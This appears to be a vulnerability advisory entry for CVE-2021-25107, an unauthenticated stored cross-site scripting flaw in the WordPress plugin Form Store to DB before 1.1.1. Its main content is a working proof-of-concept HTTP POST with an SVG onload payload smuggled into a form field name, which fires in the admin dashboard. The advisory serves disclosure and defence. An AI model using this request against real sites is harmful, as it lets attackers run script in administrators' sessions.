Lucene search
Yoru OniWPEX-ID:3999A1B9-DF85-43B1-B412-DC8A6F71CC5DHistoryJan 17, 2022 - 12:00 a.m.
Form Store to DB < 1.1.1 - Unauthenticated Stored Cross-Site Scripting
2022-01-1700:00:00
Yoru Oni
91
0.001 Low
EPSS
Percentile
31.8%
The plugin does not sanitise and escape parameter keys before outputting it back in the created entry, allowing unauthenticated attacker to perform Cross-Site Scripting attacks against admin
POST /wp-json/contact-form-7/v1/contact-forms/1337/feedback HTTP/2
Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-name"
Attacker
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-email"
[email protected]
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-subject"
XSS Injection
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-message"
Sorry, not sorry.
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="AA<svg/onload=(alert)(/XSS/)>"
Injected
-----------------------------243715402120191890871051639470--
The XSS will be triggered when viewing the related Entry in the admin dashboard (/wp-admin/edit.php?post_type=cf7storetodbs)Related
cve
cve
CVE-2021-25107
2022-02-14 12:15:15
cvelist
cvelist
prion
prion
Cross site scripting
2022-02-14 12:15:00
cnvd
cnvd
WordPress Form Store to DB plugin cross-site scripting vulnerability
2022-02-16 00:00:00
wpvulndb
wpvulndb
Form Store to DB < 1.1.1 - Unauthenticated Stored Cross-Site Scripting
2022-01-17 00:00:00
patchstack
patchstack
nvd
nvd
CVE-2021-25107
2022-02-14 12:15:15